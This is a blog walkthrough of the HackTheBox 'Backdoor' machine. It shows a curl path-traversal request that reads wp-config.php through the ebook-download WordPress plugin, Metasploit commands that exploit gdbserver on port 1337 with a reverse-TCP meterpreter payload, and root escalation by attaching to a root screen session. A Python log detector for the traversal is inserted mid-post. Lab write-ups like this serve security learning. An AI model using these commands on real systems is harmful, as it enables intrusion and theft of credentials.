Backdoor — Hackthebox Walkthrough

Kavishka Gihan
4 min read · Apr 23, 2022

This was a box that I didn’t like that much; it felt a little too CTF-ish to me. Despite that, I learned some cool things.

User

Nmap revealed three open ports.

nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv backdoor.htb

PORT     STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
| 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking at the web server on port 80, it was a WordPress site.

So I ran wpscan to see if there were any vulnerabilities we could exploit, but it didn’t find anything. So I had to enumerate the site manually, and I saw that the “ebook-download” plugin was installed.

With a quick Google search I found that this plugin was vulnerable to LFI.

As mentioned in the PoC, I tried to include wp-config.php, and it worked.

curl 'http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
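A defender’s counterpart to the request above, added here as an example and not part of the original post: a small Python detector that scans Apache access-log lines for requests to the ebook-download plugin’s filedownload.php whose ebookdownloadurl parameter carries a directory-traversal or absolute local path, peeling URL-encoding first. The log lines and client IPs are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (client IPs are made up).
SAMPLE_LOG = """\
10.10.14.5 - - [23/Apr/2022:10:01:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3211 "-" "curl/7.81.0"
10.10.14.5 - - [23/Apr/2022:10:01:09 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2F..%2Fproc%2F1%2Fcmdline HTTP/1.1" 200 80 "-" "python-requests/2.27"
192.0.2.10 - - [23/Apr/2022:10:02:00 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://backdoor.htb/wp-content/uploads/book.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
192.0.2.11 - - [23/Apr/2022:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"


def traversal_hits(log_text):
    """Return (ip, timestamp, decoded ebookdownloadurl) for each request that
    reaches the vulnerable endpoint with a traversal or absolute local path."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != PLUGIN_PATH:
            continue
        for raw in parse_qs(parts.query).get("ebookdownloadurl", []):
            decoded = raw
            for _ in range(3):  # peel double/triple URL-encoding
                nxt = unquote(decoded)
                if nxt == decoded:
                    break
                decoded = nxt
            norm = decoded.replace("\\", "/")
            if "../" in norm or norm.startswith("/"):
                hits.append((m["ip"], m["ts"], decoded))
    return hits


if __name__ == "__main__":
    for ip, ts, path in traversal_hits(SAMPLE_LOG):
        print(f"{ts} {ip} -> {path}")
```

Only the two traversal requests are reported; the plugin’s normal remote-URL download and the unrelated index.php request are ignored.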

With this I tried to include files that I thought were important, but I couldn’t find anything interesting. Then I remembered that port 1337 was open. I didn’t know what service was running on that port, so I thought of looking at which process was running that service and finding out what the service was.

For this I wrote a little Python script that fuzzes the running process IDs and looks at which command is running each process.

python3 proc-fuzz.py > proc
cat proc | uniq

With this I was able to identify that gdbserver was running on port 1337.

And I was able to find a Metasploit module to exploit this.

Following this article, I was able to exploit this and get a meterpreter instance.

sudo msfdb run
use exploit/multi/gdb/gdb_server_exec
set payload linux/x64/meterpreter/reverse_tcp
set RHOST 10.10.11.125
set RPORT 1337
set LHOST tun0
set LPORT 1234
run

Root

Running linpeas as the “user” user, I saw that screen, a virtual screen manager, was running.

The output showed a screen session running as root named “root”, and the screen binary was SUID as well.

So I was able to attach to that screen session and get into a root shell.

screen -x root/root

Rooted!!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram —
https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄


Kavishka Gihan

Cyber Security Student | Machine author @hackthebox | find me on instagram @_kavi.gihan